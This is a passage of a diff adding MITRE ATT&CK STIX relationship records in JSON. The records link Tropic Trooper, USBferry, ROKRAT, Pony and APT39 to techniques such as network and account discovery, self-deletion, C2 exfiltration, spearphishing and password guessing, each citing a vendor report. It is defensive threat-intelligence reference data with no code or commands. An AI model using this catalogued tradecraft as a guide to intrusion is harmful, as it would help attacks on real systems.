+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used Windows command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--702b125c-993e-468f-8ea9-6862048be772",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.295Z",
+ "created": "2020-05-21T14:55:00.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has tested if the localhost network is available and other connection capability on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--df7e5314-665b-44a3-8040-f6cb8fd28cbf",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.329Z",
+ "created": "2020-05-21T14:55:00.329Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has deleted dropper files on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--098a760a-66ce-46e0-938e-86518e450a27",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.332Z",
+ "created": "2020-05-21T14:55:00.332Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--53c8de3e-f862-44d5-be7e-274e14bdd57e",
+ "type": "relationship",
+ "modified": "2020-05-21T17:07:02.401Z",
+ "created": "2020-05-21T17:07:02.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) can request to upload collected host data and additional files.(Citation: NCCGroup RokRat Nov 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--d1a17f31-c62f-4ec3-9a77-41e6a339a657",
+ "type": "relationship",
+ "modified": "2020-05-21T17:07:02.444Z",
+ "created": "2020-05-21T17:07:02.444Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use netstat and nbtstat to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e6cd4568-3c15-4d1d-ab2c-c799141cf34b",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.909Z",
+ "created": "2020-05-21T17:14:56.863Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use tasklist to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bfad86a1-f8bb-45eb-b7b9-5919ca4ef886",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.914Z",
+ "created": "2020-05-21T17:14:56.882Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use net user to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0bbf5be7-e1de-419e-85ee-afaa431f60be",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.950Z",
+ "created": "2020-05-21T17:14:56.884Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use net view to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--15a571d1-652c-4148-9dee-12d3b1cbff62",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.953Z",
+ "created": "2020-05-21T17:14:56.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f2810da3-1a6f-4c48-826d-929bde7f7af3",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.107Z",
+ "created": "2020-05-21T21:31:34.107Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--404f482d-160d-47ea-9eff-5ca7392eb5b2",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.133Z",
+ "created": "2020-05-21T21:31:34.133Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used the NetUserEnum function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d5ecfa68-2027-4dd5-adf0-1eb82463cfc5",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.148Z",
+ "created": "2020-05-21T21:31:34.148Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--dd8d683a-0c17-448f-b604-105e130f4b04",
+ "type": "relationship",
+ "modified": "2020-06-15T16:51:22.108Z",
+ "created": "2020-05-21T21:31:34.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3ea6e72b-3d19-4864-aebd-cc31dad7d519",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.256Z",
+ "created": "2020-05-21T21:31:34.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6dd4567-92ac-47e3-9688-2d555c239705",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.268Z",
+ "created": "2020-05-21T21:31:34.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--237cd65a-e30e-4f8a-9822-f50b818e1491",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.271Z",
+ "created": "2020-05-21T21:31:34.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8dd83463-b0cb-46e9-a01a-b22c6780066f",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.116Z",
+ "created": "2020-05-21T21:31:34.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a0b2b4b4-c522-4428-a70b-ad1002417a28",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.112Z",
+ "created": "2020-05-21T21:31:34.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--02075984-9bec-465e-8a21-6717b9a1308b",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.290Z",
+ "created": "2020-05-21T21:31:34.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) attachments have been delivered via compressed archive files. [Pony](https://attack.mitre.org/software/S0453) also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4b2fa1ed-6c4f-4974-a44e-beeadf3a887c",
+ "type": "relationship",
+ "modified": "2020-06-15T16:51:22.160Z",
+ "created": "2020-05-21T21:31:34.298Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8f5e9158-1abe-4ed7-8a0a-df07f629aac8",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.306Z",
+ "created": "2020-05-21T21:31:34.306Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5853ff4e-9982-4d66-bf98-6c22fa42f305",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.404Z",
+ "created": "2020-05-21T21:31:34.404Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--0d1cb122-5195-4d04-b5c9-85f4747886fa",
+ "type": "relationship",
+ "modified": "2020-06-15T21:31:38.170Z",
+ "created": "2020-05-21T21:31:34.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--cbdb211a-2772-4905-99f1-0415fb0738b3",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.422Z",
+ "created": "2020-05-21T21:31:34.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the Smartftp Password Decryptor tool to decrypt FTP passwords.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8b2af30a-523f-41fe-88c3-ab2ee15bdec5",
+ "type": "relationship",
+ "modified": "2020-05-29T20:05:25.867Z",
+ "created": "2020-05-22T15:43:05.190Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used various tools to proxy C2 communications.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--073aff0c-1dd2-40f4-87da-d90809f3418a",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.622Z",
+ "created": "2020-05-22T15:43:05.194Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has created accounts on multiple compromised hosts to perform actions within the network.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c6f11dfe-dd59-4310-9619-ed42ee48d736",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.636Z",
+ "created": "2020-05-22T15:43:05.196Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
